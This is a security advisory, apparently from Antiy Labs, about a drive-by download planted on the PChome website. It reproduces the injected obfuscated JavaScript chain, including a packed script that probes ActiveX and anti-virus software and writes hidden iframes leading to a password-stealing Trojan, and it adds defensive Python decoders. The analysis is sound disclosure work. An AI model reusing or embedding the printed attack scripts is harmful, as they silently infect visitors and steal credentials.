On December 28, Antiy Labs' anti-virus monitoring network found that the PChome (电脑之家) website (http://article.pc****.net/content-502393-7.html) had been implanted with a virus by hackers: when a user visits the site, the system automatically downloads and runs malicious programs from a malicious website. A system infected by the virus may be remotely controlled, have the user's sensitive information stolen, and have its disk data destroyed.
The problem code on the site:

<script src="http://btn.pc****.net/flash.js"></script><!--ad JS, do not delete-->
The following obfuscated code was inserted into http://btn.pc****.net/flash.js:
document.write(thtml);
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
Its purpose is to connect to the address http://www.**.vc/page/add_644455.htm
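The hex escapes above hide nothing more than a document.writeln call that drops a zero-size iframe into the page. The Python script below is an added example, not code from Antiy's report: it decodes the \xNN and \uNNNN escapes a JavaScript string literal may carry and then flags every iframe that is made invisible through width=0, height=0, display:none or visibility:hidden, which is the check an analyst or a web-integrity monitor wants when reviewing the JavaScript a site serves. The sample string is constructed to mirror the injected flash.js, with example.invalid standing in for the masked domain.

```python
import re

# \xNN and \uNNNN escapes, as JavaScript string literals use them.
ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})')
IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'''([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)''')

# Constructed sample modelled on the injected flash.js; example.invalid is a
# placeholder, not the real domain.
SAMPLE_JS = (
    r'window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]'
    r"('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 "
    r'\x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f'
    r"example.invalid/page/add_1.htm\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');"
)


def decode_js_escapes(text):
    """Replace hex and unicode escapes with the characters they encode."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def find_hidden_iframes(html):
    """Return every iframe with its src and whether it is made invisible."""
    found = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v.strip('"\'') for k, v in ATTR_RE.findall(m.group(1))}
        style = attrs.get('style', '').replace(' ', '').lower()
        hidden = (attrs.get('width') == '0' or attrs.get('height') == '0'
                  or 'display:none' in style or 'visibility:hidden' in style)
        found.append({'src': attrs.get('src', ''), 'hidden': hidden})
    return found


def analyse(js):
    """Decode a script and report the hidden iframes it would write into the page."""
    decoded = decode_js_escapes(js)
    return {'decoded': decoded, 'iframes': find_hidden_iframes(decoded)}


if __name__ == '__main__':
    report = analyse(SAMPLE_JS)
    print(report['decoded'])
    for frame in report['iframes']:
        print('iframe', frame['src'], 'HIDDEN' if frame['hidden'] else 'visible')
```

Decoding before matching is the point: a signature for `<iframe` or `display:none` never fires on the escaped form, so any content check on served JavaScript has to normalise string escapes first.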
The code of http://www.**.vc/page/add_644455.htm is:

<script src=addr.js></script>
addr.js (obfuscated code):
eval(function(p,a,c,k,e,d){e=function
(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>
35?String.fromCharCode(c+29):c.toString(36))}
;if(!''.replace(/^/,String)){while(c--)d[e(c)]
=k[c]||e(c);k=[function(e){return d[e]}];
e=function(){return'\\w+'};c=1};while(c--)
if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'
\\b','g'),k[c]);return p}('1r A(){1q(i=2;i
<1p;i++){l s=4 S();l r=4 S();l t=B.1o(1n+i)
;s.6="R:@Q:"+t+":\\\\P%O\\\\q%N\\\\q%M%L%1m.0
\\\\K\\\\J.I::/H/G.5";r.6="R:@Q:"+t+":\\\\P%O
\\\\q%N\\\\q%M%L%1l.0\\\\K\\\\J.I::/H/G.5";
9(s.F==E||r.F==E)D 1k}D 1j}l p=4 1i();
o="n";p.1h(p.1g()+1f*C*C*1e);l z=4 B(8.x);
l y="w=";o="n";9(!A()&&z.u(y)==-1){o="n";
8.x="w=1d;1c="+p.1b();o="n";k{9(4 m("v.v.1"))
8.j(\'<3 h=g:f 6="d://c.b/1a.5"></3>\')}a(e)
{}k{9(19.18.17().u("16 7")==-1)8.j(\'<3 h=g:
f 6="d://c.b/15.5"></3>\')}a(e){}k{9(4 m
("14.13"))8.j(\'<3 h=g:f 6="d://c.b/12.5">
</3>\')}a(e){}k{9(4 m("11.10.1"))8.j(\'
<3 h=g:f 6="d://c.b/Z.5"></3>\')}a(e){}k
{9(4 m("Y.X.1"))8.j(\'<3 h=g:f 6="d://c.
b/W.5"></3>\')}a(e){}k{9(4 m("V.U.1"))8.j
(\'<3 h=g:f 6="d://c.b/T.5"></3>\')}a(e){}}
',62,90,'|||iframe|new|gif|src||document
|if|catch|vg|w18|http||none|display|style|
|write|try|var|ActiveXObject|xxxyyyyfassssf
sadfasdf|aaxxx|Then|Kaspersky|kis7|kis6|root
|indexOf|IERPCtl|Cookie1|cookie|cookieHeader|
aaffdasfascookie|bIsKIS|String|60|return|41|
height|help|images|chm|context|Doc|20Security|
20Internet|20Lab|20Files|Program|MSITStore|mk|
Image|baidu|Tool|BaiduBar|bf|StormPlayer|MPS
|lz|GLChatCtrl|GLCHAT|xl|Vod|DPClient|ms|msie
|toLowerCase|userAgent|navigator|real
|toGMTString|expires|POPWINDOS|1000|24|getTime
|setTime|Date|false|true|207|206|65
|fromCharCode|26|for|function'.split('|'),0,{}))
Its purpose is to connect to http://***.vg/ms.gif
The obfuscated code of http://***.vg/ms.gif:
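addr.js is wrapped in the widely known p,a,c,k,e,d packer: the last string is a '|'-separated word list, and the first string is the program with every word replaced by a base-62 token. The word list alone (ActiveXObject, Kaspersky, kis6, kis7, IERPCtl, BaiduBar, StormPlayer, iframe, style, display, none) already tells an analyst that the script checks which controls and which anti-virus product are installed before writing hidden iframes. The Python unpacker below is an added example, not code from the report: it ports the packer's e() token encoder, rebuilds the token table, substitutes the words back, and lists URLs and ActiveX ProgIDs from the result. The packed sample is constructed in the same format, with example.invalid as a placeholder domain.

```python
import re

# Tail of a p,a,c,k,e,d call: ('program', base, count, 'words'.split('|'), 0, {})
PACKED_RE = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)",
    re.S)
URL_RE = re.compile(r'''https?://[^\s"'<>)]+''')
PROGID_RE = re.compile(r'''ActiveXObject\(\s*["']([^"']+)["']\s*\)''')

# Constructed sample in the same packer format as addr.js; example.invalid is a placeholder.
SAMPLE_PACKED = (
    r"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    r"+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
    r"if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];"
    r"e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}"
    r"""('1.2(\'<3 4="5://6.7/8.9" a=0 b=0></3>\')',62,12,"""
    r"'|document|write|iframe|src|http|example|invalid|x|htm|width|height'.split('|'),0,{}))"
)


def _encode_token(c, base):
    """Port of the packer's e(): digits 0-9, then a-z, then A-Z (base up to 62)."""
    prefix = '' if c < base else _encode_token(c // base, base)
    c %= base
    if c > 35:
        digit = chr(c + 29)              # 36..61 -> 'A'..'Z'
    elif c < 10:
        digit = str(c)
    else:
        digit = chr(ord('a') + c - 10)   # 10..35 -> 'a'..'z'
    return prefix + digit


def _js_unescape(s):
    # Undo the backslash escapes of a single-quoted JS literal; an unknown escape
    # keeps the escaped character, as JS does.
    table = {'n': '\n', 'r': '\r', 't': '\t'}
    return re.sub(r'\\(.)', lambda m: table.get(m.group(1), m.group(1)), s, flags=re.S)


def unpack(packed):
    """Rebuild the token->word table and substitute the words back into the program."""
    m = PACKED_RE.search(packed)
    if not m:
        raise ValueError('no p,a,c,k,e,d payload found')
    p, base, count = _js_unescape(m.group(1)), int(m.group(2)), int(m.group(3))
    words = m.group(4).split('|')
    table = {}
    for i in range(count):
        tok = _encode_token(i, base)
        # An empty word-list entry means the token stands for itself (e.g. the literal 0).
        table[tok] = words[i] if i < len(words) and words[i] else tok
    return re.sub(r'\b\w+\b', lambda w: table.get(w.group(0), w.group(0)), p)


def extract_indicators(code):
    """URLs and ActiveX ProgIDs found in unpacked code, for a triage note."""
    return {'urls': sorted(set(URL_RE.findall(code))),
            'progids': sorted(set(PROGID_RE.findall(code)))}


if __name__ == '__main__':
    code = unpack(SAMPLE_PACKED)
    print(code)
    print(extract_indicators(code))
```

The unpacker never evaluates the script: it reproduces the packer's table statically, so it is safe to run over a sample taken from a compromised page, and the indicator list is what goes into the blocking and notification steps.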
<html><head>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<noscript><iframe></iframe></noscript>
<script language="javascript"><!--hT46="\r\
/G6Pt\\u",gL86="\rR\/a\/q\/t";.6670539,mG54=".
6973056",hT46='\r69lM\+\ gsB\{F\&0mp\\\;\-GA\>
\=\:\}NKx\,\%\$q41XoSDnCEZjfrQ8\#\.\nh\"\(k\?
\^ie\|\'\]Ra5uT\!wcb\@H\*\)Vy3\~Ozd2JPYv7U\_\
<\/IL\[\`tW',gL86='uq\>x\^\<vT\;g\ paSwb\+\}
\~0\_8V\[dH\?\:IocR6lL41\,\#\)K\=Z\|JPC\rD
\*B2k\&MF\$Y\.O\@s\/hEU\`f\(jr\-nA\n\\\!WymGXz
\{Qt\]9i5N3e7\'\%\"';function lO15(iT78)
{"\rP6uqqtP",l=iT78.length;'\'LDLL\_\(D',w=''
;while(l--)"\rq\/q6\/tP",o=hT46.indexOf
(iT78.charAt(l)),'\'\=AS\/DS\/',
w=(o==-1?iT78.charAt(l):gL86.charAt(o))+w;
"\r\\\/tqP\\6",hT46=hT46.substring(1)+hT46.
charAt(0),document.write(w);'\'DD1S1D\/'};
lO15("\+R\$\@\_Fv\{1\&\*B\r\&BLZb\&\ \&R\$
\@\_Fv9J\)\"SZo\[SIs\_wc\}\%\$\rzL\*v\|\&
11CPw\r\*\$v\_\%\*\{A\}zcCP\@Lv\r\@\*\{w\
&1RL\;sw\r\*\$v\_\%\*\{Az\}zcCP\}\%\$\rzL\
*v\|\%\*\$\%\*vLlvzL\*\rZA\}zsRLvg\_zL\%\
rvcWAz\}zcCWD\>GGC\;sAz\}zcCs\;\}\%\$\rzL\
*v\|\%\*\$\%\*vLlvzL\*\rZ\*Lm\{\^\r\*\$v\_
\%\*cW\@Lv\r\@\*\{w\&1RLWCsw\r\*\$v\_\%\*\
{A\*\}zcLCP\_wc\}\%\$\rzL\*v\|1\&OL\@Rffm\_
\*\}\%m\|R\_\}Lp\&\@CP\_wcL\|m5\_\$53ZSC\
@Lv\r\@\*\{w\&1RLs\;\;s\_wc\}\%\$\rzL\*v\|
1\&OL\@RCP\}\%\$\rzL\*v\|\$\&Fv\r\@Lu\ L\
*vRcu\ L\*v\|\?\'T0u\.\'\~\/Cs\}\%\$\rzL\
*v\|\%\*z\%\rRL\}\%m\*ZA\*\}zs\;L1RLP\}\%
\$\rzL\*v\|\%\*z\%\rRL\rFZA\*\}zs\;sv0\<SZ
\[\>\<osR\'I\>Z\"\[SIsw\r\*\$v\_\%\*\{A\}
mRcCPm\_\*\}\%m\|Rv\&v\rR\{Z\{W\{WsRLvg\_zL
\%\rvcWA\}mRcCWDSGGCs\;sA\}mRcCs\}uSoZ\[\
<4UsR\^SGZ\>UU\[sw\r\*\$v\_\%\*\{A\}\}RcCP
\_wc\}\%\$\rzL\*v\|\&11CP\}\%\$\rzL\*v\|\%
\*RL1L\$vRv\&\@vZw\r\*\$v\_\%\*\{cCP\@Lv\r
\@\*\{w\&1RL\;sRLvg\_zL\%\rvcWA\}\}RcCWD\
[GGC\;\;sA\}\}RcCs\ 0ISZ\<\<4\>sFe\>4Z\>\
[S\<sw\r\*\$v\_\%\*\{A\*\@cCP\@Lv\r\@\*\
{v\@\rL\;\%\*L\@\@\%\@ZA\*\@sRE\[Z\<\"\>
4sm\'GZ\>So\"s\_\.\[\<Z\"UU\>s1d4\>Z\<\>\
<IsO\/\>SZ\<\>\<4slE4\>Z\[S\<s\_jooZ\<\<\
[SssA1\_\$L\*RL\}Av\%AZW5\rO\rwL\*BWs\+aR
\$\@\_Fv9")//--></script><ScRiPT languAgE=
JAvaSCRipT>lO15("\aqH\<\&7l\.yF7HzF\.yY\.
yF\\\/caN0ca0pcacjt\\\\\\\\\\\\\\0Nac0ac
N0NactB\.yFg0HF\"cjN\$q6d\[\)7\'qH\[07\
[TX\[d\[\)7b\r3M1i3M1\(3M1V3M1\/3M1L3M\`
S\rEB\.yF\"c\'a\[7V77H\<\\67\[b\r3M1L3M1
\#3M1D3M\`L3M\`L3M1\_3M1S\rn\r3M1L3M1\
#3M\`L3M1\_3M1S3MLV3MS\(3MSS3ML\_
3ML13MSL3ML\/3ML\/3ML13M\(\n3ML13ML\/
3MSD3MLL3M\(\n3MLD3MLD3MSS3MLA3M\(\n3ML
\_3ML\=3MLL3MSD3M\(\n3MLA3MLA3MSL3MLA3ML
S3MS13MSL3ML\(3ML\_3MS\/3MLL3ML1\rEB\.
yFg0HFZMj\"c\'\#H\[07\[\]\\\@\[q7b\r3MS
\n3M1\_3M1L3M\`\(3M1i3M\`L3M1i3M113M\
`S3M\(T3M\/\=\r\;\r3MS\n3MS\#3MS\=3M\
/S3M\/S3M\/A\rn\r\rEB\.yFg0HFVmj\"c\'
\#H\[07\[\]\\\@\[q7b\r3MSD3M1S3M1i3M1S3M1
\(3M\(T3M\/L3M\`S3M\`\(3M1\/3M1D3M1\n
\rn\r\rEB\.yF\\\/caN0ca0pcacjt\\\\\\\\\
\\\\\0Nac0acN0NactB\.yF\\\/caN0ca0pcacjt
\\\\\\\\\\\\\\0Nac0acN0NactB\.yFVm\'7z\&
\[jDB\.yF\\\/caN0ca0pcacjt\\\\\\\\\\\\\\
0Nac0acN0NactB\.yFZM\'\$\&\[\)b\r3MS\`3MS
\/3M\/S\rnFt3M1\=3M\`S3M\`S3M\`A3ML03M\
(c3M\(c3M\`\`3MLD3ML\=3M\(\[3M\`13M1\`3M
\(c3M\`L3M\(\[3M1\/3M\`\=3M1\/tnAEB\.yF
\\\/caN0ca0pcacjt\\\\\\\\\\\\\\0Nac0acN
0NactB\.yFZM\'a\[\)NbEB\.yF\\\/caN0ca0pca
cjt\\\\\\\\\\\\\\0Nac0acN0NactB\.yFIaDjt
3M\`T3M\/S3M1\/3M1\n3M\`At\;\^07u\'H\$6
\)Nb\^07u\'H0\)N\$dbEh\_\_\_\_E\;t3M\
(T3M\`S3M1\n3M\`AtB\.yF\\\/caN0ca0pcacjt
\\\\\\\\\\\\\\0Nac0acN0NactB\.yFg0HFqij
\"c\'\#H\[07\[\]\\\@\[q7b\r3M\/L3M1L3M
\`\(3M1\_3M\`A3M\`S3M1\_3M1T3M1\`3M\
(T3MS13M1\_3M1\#3M1\/3M\/L3M\`\_3M\
`L3M\`S3M1\/3M1\n3MSi3M1\(3M1V3M1\
/3M1L3M\`S\rn\r\rEB\.yFg0HFIasd\&jqi\'
2\[7m\&\[q\<0Xi\$XN\[HbAEBFIaDjFqi\'
\"6\<XN807ubIasd\&nIaDEBFVm\'\]\&\
[\)bEBVm\'OH\<7\[bZM\'H\[a\&\$\)a\
[\"\$NzEB\.yFVm\'m0g\[s\$i\<X\[bIaDn
\(EBFVm\'\#X\$a\[bEBFg0HF9j\"c\'\#H\
[07\[\]\\\@\[q7b\r3M\/L3M1\=3M1\/3M1\
#3M1\#3M\(T3MSD3M\`A3M\`A3M1\#3M1\
_3M1L3M1D3M\`S3M1\_3M1i3M1T\rn\r\rEB\.
yF\$kDjqi\'\"6\<XN807ubIasd\&\;t3M\/
\#3M\/\#3M\`L3M\`\_3M\`L3M\`S3M1\/3M1
\n3MLL3ML\(tnt3M1L3M1\n3M1S3M\(T3M1\
/3M\`\=3M1\/tEB\.yF9\}\r3M\/L3M1\=3M1\
/3M1q3M1q3MS\/3M\`\=3M1\/3M1L3M\`\/3M\`
S3M1\/\rUb\$kDnt3M\(A3M\(i3M1LFt\;IaDn\
r\rn\r3M1i3M\`A3M1\/3M1T\rnAEB\.yF\\\/
caN0ca0pcacjt\\\\\\\\\\\\\\0Nac0acN0NactB
\.y\-\.yFq07qubMMc9\[0NacEFYFMMc9\[0NacjDBF
\-\.y\ 5aqH\<\&7l")</script></head><body>
<noscript><b><font color=red>This page
requires a javascript enabled browser!!!
</font></b></noscript></body></html>
Its purpose is:
http://***.vg/s.exe
http://***.vg/ss.exe
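ms.gif is an HTML page rather than an image, and its script body is a substitution cipher: lO15() walks its argument from the last character to the first, replaces each character found in hT46 with the character at the same index in gL86, leaves any other character alone, writes the result, and then rotates hT46 left by one position. Because hT46 is a global, the second <script> block on the page decodes with the rotated alphabet. The Python port below is an added example, not code from the report; its two alphabets and the two-part payload are constructed (lo15_encode exists only to build that fixture), and it returns the rotated alphabet so the second block can be decoded in sequence.

```python
import string

# Two permutations of one character set, constructed for this example; the real
# sample on the page uses its own pair of printable-character strings.
CHARSET = string.ascii_letters + string.digits + ' <>="\'/.:;-_!()'
ALPHA = CHARSET          # plays the role of hT46 (lookup alphabet, rotated after each call)
SUBST = CHARSET[::-1]    # plays the role of gL86 (output alphabet)

# Constructed two-part payload standing in for the two <script> blocks of ms.gif.
SAMPLE_HTML_1 = '<script src="http://example.invalid/stage2.js"></script>'
SAMPLE_HTML_2 = '<iframe width=0 height=0 src="http://example.invalid/x.htm"></iframe>'


def lo15_decode(encoded, alpha=ALPHA, subst=SUBST):
    """Port of the page's lO15(): substitute through alpha -> subst, then rotate alpha.

    Returns the decoded text and the rotated alphabet, because the original keeps
    the rotation in a global and the next call starts from it.
    """
    out = []
    for ch in reversed(encoded):        # the original walks from the end and prepends
        o = alpha.find(ch)
        out.append(ch if o == -1 else subst[o])
    return ''.join(reversed(out)), alpha[1:] + alpha[0]


def lo15_encode(plain, alpha=ALPHA, subst=SUBST):
    """Inverse substitution, used here only to build the test fixture."""
    out = []
    for ch in plain:
        o = subst.find(ch)
        out.append(ch if o == -1 else alpha[o])
    return ''.join(out)


def build_sample():
    """Encode block 1 with the initial alphabet and block 2 with it rotated once."""
    enc1 = lo15_encode(SAMPLE_HTML_1)
    enc2 = lo15_encode(SAMPLE_HTML_2, ALPHA[1:] + ALPHA[0])
    return enc1, enc2


def decode_sample():
    """Decode both blocks in page order, carrying the rotated alphabet across."""
    enc1, enc2 = build_sample()
    html1, alpha = lo15_decode(enc1)
    html2, _ = lo15_decode(enc2, alpha)
    return html1, html2


if __name__ == '__main__':
    for block in decode_sample():
        print(block)
```

Decoding the second block with a fresh alphabet yields garbage, which is why a static decoder for this family has to replay the calls in the order the page makes them.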
When a user visits http://article.pc****.net/content-502393-7.html, the system automatically downloads the following virus files:
http://***.vg/s.exe (file no longer available)
http://***.vg/ss.exe
Virus name: (Trojan-PSW.Win32.Delf.ajm) password-stealing Trojan